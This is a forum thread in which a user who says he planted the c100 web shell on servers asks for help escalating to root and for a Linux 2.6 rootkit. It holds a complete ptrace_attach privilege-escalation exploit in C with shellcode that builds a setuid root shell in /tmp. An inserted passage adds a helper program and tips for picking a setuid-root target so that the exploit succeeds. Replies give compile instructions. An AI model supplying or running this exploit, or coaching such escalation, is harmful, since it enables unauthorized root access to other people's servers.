IT Security and Insecurity Portal

Now what?

Posted: Sun Jan 10, 2010 9:13 am
AIR_Nayden
Advanced user
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria

Hi
These days I uploaded c100 on some servers... but there are directories which aren't editable by me. So my question is: how do I escalate my privileges or log in as another user?
Please give more details, because I'm not very good at working with Unix systems...
Posted: Sun Jan 10, 2010 10:44 am
AIR_Nayden
Advanced user
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria

Does anyone have a rootkit for the 2.6.x Linux kernel?
Posted: Sun Jan 10, 2010 2:35 pm
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

Quote: Please give more details, because I'm not very good at working with Unix systems...
+
Quote: Does anyone have a rootkit for the 2.6.x Linux kernel?
A bit dumb, isn't it?
Posted: Sun Jan 10, 2010 2:40 pm
vince213333
Advanced user
Joined: Aug 03, 2009
Posts: 737
Location: Belgium

Maybe he's a fast learner, pexli
Posted: Sun Jan 10, 2010 3:18 pm
AIR_Nayden
Advanced user
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria

Well no, why would it be dumb? The one I have won't compile for some reason, so I'm looking for another one. Can you help?
Posted: Sun Jan 10, 2010 3:34 pm
vince213333
Advanced user
Joined: Aug 03, 2009
Posts: 737
Location: Belgium

Code: http://www.enye-sec.org/en/programs.html
3rd one in the list.
Or
Code: http://seclists.org/dailydave/2008/q3/215
I hope it helps
Posted: Sun Jan 10, 2010 3:36 pm
AIR_Nayden
Advanced user
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria

Well, I found one, compiled it and tried to run it, but I suppose I didn't do that correctly.
Code:
/*
ptrace_attach privilege escalation exploit by s0m3b0dy
[*] tested on Gentoo 2.6.29rc1
grataz:
Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo...
email: s0m3b0dy1 (at) gmail.com
*/
#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>

/* x86-32 payload: setuid(0), then execve("/bin//sh", ["/bin//sh", "-c", <cmd>]).
 * The command that follows the machine code compiles a small setuid(0)+/bin/bash
 * wrapper to /tmp/.exp and marks it setuid. */
char shellcode[] =
"\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99"
"\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff"
"echo \"#include <stdio.h>\nmain(){setuid(0);if(getuid()==0) printf(\\\"r00teed!\\n\\\");execv(\\\"/bin/bash\\\",0);return 0;}\" > /tmp/.exp.c;gcc /tmp/.exp.c -o /tmp/.exp;rm /tmp/.exp.c;chmod +s /tmp/.exp;exit;";

/* Register layout returned by PTRACE_GETREGS on 32-bit x86 (local copy of
 * struct user_regs_struct, so the file builds without <sys/user.h>). */
struct user_regs_struct322 {
unsigned long ebx, ecx, edx, esi, edi, ebp, eax;
unsigned short ds, __ds, es, __es;
unsigned short fs, __fs, gs, __gs;
unsigned long orig_eax, eip;
unsigned short cs, __cs;
unsigned long eflags, esp;
unsigned short ss, __ss;
};

int main(void)
{
struct user_regs_struct322 regs;
struct stat buf;
int i,o;
unsigned long * src;
unsigned long * dst;
char *env[2];
env[0]="/usr/bin/gpasswd"; // some suid file
env[1]=0;
/* Child: exec the setuid target so the bug can be raced against it. */
if((o=fork()) == 0)
{
execve(env[0],env,0);
exit(0);
}
/* Parent: attach to the child. On a patched kernel this is refused
 * once the child holds setuid credentials. */
if(ptrace(PTRACE_ATTACH,o,0,0)==-1)
{
printf("\n[-] Attach\n");
exit(0);
}
wait((int *)0);
if (ptrace(PTRACE_GETREGS, o, NULL, &regs) == -1){
printf("\n[-] read registers\n");
exit(0);
}
printf( "[+] EIP - 0x%08lx\n", regs.eip);
/* Overwrite the child's code at its current EIP with the payload,
 * one machine word at a time. */
dst= (unsigned long *) regs.eip;
src = (unsigned long *) shellcode;
for(i=0;i<sizeof(shellcode) -1;i+=4)
if (ptrace(PTRACE_POKETEXT, o, dst++, *src++) == -1){
printf("\n[-] write shellcode\n");
exit(0);
}
ptrace(PTRACE_CONT, o, 0, 0);
ptrace(PTRACE_DETACH,o,0,0);
printf("[+] Waiting for root...\n");
sleep(2);
/* The payload leaves a setuid shell wrapper behind; run it if it exists. */
if(!stat("/tmp/.exp",&buf))
{
printf("[+] Executing suid shell /tmp/.exp...\n");
execv("/tmp/.exp",0);
}
else
{
printf("[-] Damn no r00t here :(\n");
}
return 0;
}

When I run it I get this output:
Quote:
Usage: gpasswd [-r|-R] group
gpasswd [-a user] group
gpasswd [-d user] group
gpasswd [-A user,...] [-M user,...] group
[-] Attach

I guess gpasswd is some suid file (do I have to give the path to it??). But what are the other parameters? How should I run this exploit correctly?
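The exploit above hard-codes env[0] as "some suid file" and only works if that path really is a setuid-root executable that the unprivileged user may run. As an added check (example code written for this page, not part of the original post or of the exploit), the function below verifies that property with stat() and a scan over a constructed list of paths that are commonly setuid root picks the first one that qualifies; the function names and the candidate list are my own assumptions.

```c
/* Added example: confirm that a path is a setuid executable owned by `owner`
 * before handing it to an exploit as "some suid file". Not part of the
 * original post; function names and the candidate list are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 1 if `path` is a regular file with the setuid bit set, owned by
 * `owner`, and executable by others; 0 if it exists but does not qualify;
 * -1 if it cannot be stat()ed at all. */
int is_setuid_owned_by(const char *path, uid_t owner)
{
    struct stat st;
    if (stat(path, &st) == -1)
        return -1;
    if (!S_ISREG(st.st_mode))
        return 0;
    if (!(st.st_mode & S_ISUID))
        return 0;
    if (st.st_uid != owner)
        return 0;
    if (!(st.st_mode & S_IXOTH))   /* an unprivileged caller must be able to exec it */
        return 0;
    return 1;
}

/* Scans the NULL-terminated `candidates` array and returns the first path
 * that is a setuid-root executable, or NULL if none qualifies. */
const char *first_setuid_root(const char *const *candidates)
{
    for (; *candidates; candidates++)
        if (is_setuid_owned_by(*candidates, 0) == 1)
            return *candidates;
    return NULL;
}

int main(void)
{
    /* Constructed list of paths that are commonly setuid root on Linux. */
    static const char *const candidates[] = {
        "/usr/bin/gpasswd", "/usr/bin/passwd", "/usr/bin/chsh",
        "/usr/bin/chfn", "/usr/bin/newgrp", "/bin/su", "/usr/bin/su",
        NULL
    };
    const char *hit = first_setuid_root(candidates);
    if (hit)
        printf("[+] setuid-root candidate: %s\n", hit);
    else
        printf("[-] none of the candidates is a setuid-root executable\n");
    return 0;
}
```

Run it on the target box before trying the exploit: if it prints no candidate, the path in env[0] needs to be replaced with one that is actually setuid root there, and if /tmp is mounted nosuid the setuid bit on /tmp/.exp that the payload relies on will be ignored even when the race succeeds.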
Posted: Sun Jan 10, 2010 6:52 pm
gat3way
Regular user
Joined: Dec 11, 2008
Posts: 5

Quote: http://www.enye-sec.org/en/programs.html
Very interesting...
Posted: Sun Jan 10, 2010 7:13 pm
AIR_Nayden
Advanced user
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria

Vince, do you have any idea how to compile the exploit that you suggested?
Posted: Sun Jan 10, 2010 7:23 pm
vince213333
Advanced user
Joined: Aug 03, 2009
Posts: 737
Location: Belgium

gat3way wrote:
Quote: http://www.enye-sec.org/en/programs.html
Very interesting...

Randomly googled
And AIR_Nayden, it seems like C code to me, based on the use of structures and -1 instead of the boolean "false", etc. Though I don't know that much about this kind of exploit.
Maybe use the program gcc and try
Code: gcc exploit.c -o nameOfExploitAfterCompiling
I'm just guessing though, there are people on here who know much more about this than I do
Posted: Sun Jan 10, 2010 7:29 pm
AIR_Nayden
Advanced user
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria

But which filename should I write? There is more than one .c file
Posted: Sun Jan 10, 2010 7:32 pm
vince213333
Advanced user
Joined: Aug 03, 2009
Posts: 737
Location: Belgium

Try looking for the file with the "main" function in it. That's usually the function that is executed first in C.
www.waraxe.us Forum Index -> Shell commands injection